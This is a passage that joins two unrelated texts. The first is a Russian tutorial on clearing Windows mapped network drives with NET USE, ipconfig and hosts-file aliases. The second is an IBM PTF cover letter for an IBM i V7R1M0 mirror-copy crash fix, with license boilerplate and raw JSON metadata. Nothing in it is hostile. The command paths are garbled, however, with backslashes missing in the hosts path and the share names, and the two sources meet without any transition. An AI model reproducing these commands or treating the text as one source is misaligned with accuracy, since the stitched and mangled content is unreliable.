2. Удалить существующие подключения без перезагрузки. Вариант немного сложнее, но работает не хуже. Для этого придется поработать руками. Заходим в командную строку Windows (мой любимый способ через Win-X и там уже выбрать). Вводим команду NET USE. Она возвращает нам список подключенных удаленных папок. Затем удаляем ненужное подключение через NET USE xxx /DELETE, где xxx тот ресурс в качестве которого у нас подключена удаленная папка. Либо же удаляем вообще все подключения через NET USE * /DELETE.

3. Далеко не у всех пункты 1 и 2 срабатывают. Поэтому самые hard-core users советуют заодно «почистить» всё остальное, что так или иначе касается сетевых подключений. Все делается там же, в командной строке, после проведения операции из пункта 2. Поочередно запускаем следующие команды:

ipconfig /release
ipconfig /flushdns
ipconfig /renew

Все вышеприведённые варианты должны, просто обязаны, помочь в проблеме. Но, что, если нет? Например, если NET USE возвращает, что у вас в системе нет никаких подключений? Мой NET USE просто отписывался «There are no entries in the list.», так как банально не видел подключений сделанных и сохраненных через проводника.

В таком случае поступаем другим, не менее интересным способом. Но для его понимания, нужно понять каким образом сетевой стек в Windows идентифицирует удаленные сервера. А делает он это очень просто. По какому сетевому имени к серверу подключаешься, так он его и запоминает. В моем варианте я подключался через проводник и в командном файле к серверу по его IP-адресу ( Но ведь у сервера есть еще и его сетевое имя. У меня он зовется N3050. И вместо NET USE B: \ BU2 /user:BUS /persistent:no я могу вполне резонно воспользоваться NET USE B: \N3050BU BU2 /user:BUS /persistent:no и все заработает.

А если подключений к одному серверу с разными учетными данными требуется еще больше, то можно воспользоваться другой техникой: прописать в сетевые или локальные таблицы связей IP-адресов и имен дополнительные псевдонимы. В среде Windows проще всего изменить файл hosts, который обыкновенно гнездится по следующему пути WindowsSystem32driversetc.

В него можно прописать хоть десять, хоть сто псевдонимов одного и того же сервера и понаподключать такое количество подключений с разными учетками, какое только потребуется.

PTF Cover Letter

PTF ( Program Temporary Fixes ) Cover letter

AbstractLIC-SRCB6005121 XSM System crash varyon detached mirror copy

Pre/Co-Requisite PTF / Fix List


—- ——— —  ——-  ——-  ——
TR   5770999  710  MF99002   00/00    0000

Application of this PTF may disable or render ineffective programs that
use system memory addresses not generated by the IBM translator,
including programs that circumvent control technology designed to limit
interactive capacity to purchased levels.  This PTF may be a prerequisite
for future PTFs.  By applying this PTF you authorize and agree to the

This PTF is subject to the terms of the ‘IBM License Agreement for Machine
Code’, the terms of which were provided in a printed document that was
delivered with the machine.


APAR Error Description / Circumvention

After detaching the mirror copy and vary on IASP on the detached
mirror copy node, the system crashed. word 1: srcB6005121 word
2: src0D200061 word 3: src0002000A — ASM word 4: src00100013 —
Page fault while critical

The system licensed internal code has been changed to correct
the problem.


Activation Instructions


Special Instructions


Default Instructions



—————  ————————————————————
   MF52854      LIC-WAIT IASP failed to vary off when IOA failed
   MF51677      LIC-INCORROUT suspend geographic mirror protection

Summary Information

System………………………… i
Release……………………….. V7R1M0
Licensed Program…………… 5770999
APAR Fixed…………………….. View details for APAR MA41048
Superseded by:…………………. View fix details for PTF MF99011
Recompile……………………… N
Library……………………….. QSYS
MRI Feature …………………… NONE
Cum Level……………………… C1270710

System i Support

IBM disclaims all warranties, whether express or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. By furnishing this document, IBM grants no licenses to any related patents or copyrights. Copyright © 1996,1997,1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017 IBM Corporation. Any trademarks and product or brand names referenced in this document are the property of their respective owners. Consult the Terms of use link for trademark information.

[{«Type»:»MASTER»,»Line of Business»:{«code»:»LOB57″,»label»:»Power»},»Business Unit»:{«code»:»BU058″,»label»:»IBM Infrastructure w/TPS»},»Product»:{«code»:»SWG60″,»label»:»IBM i»},»Platform»:[{«code»:»PF012″,»label»:»IBM i»}],»Version»:»7.1.0″},{«Business Unit»:{«code»:»BU054″,»label»:»Systems w/TPS»},»Product»:{«code»:»SG15V»,»label»:»PTF Cover Letters — OS/400 General»},»Component»:»»,»ARM Category»:[],»Platform»:[{«code»:»PF012″,»label»:»IBM i»}],»Version»:»V7R1M0″,»Edition»:»»,»Line of Business»:{«code»:»»,»label»:»»}}]

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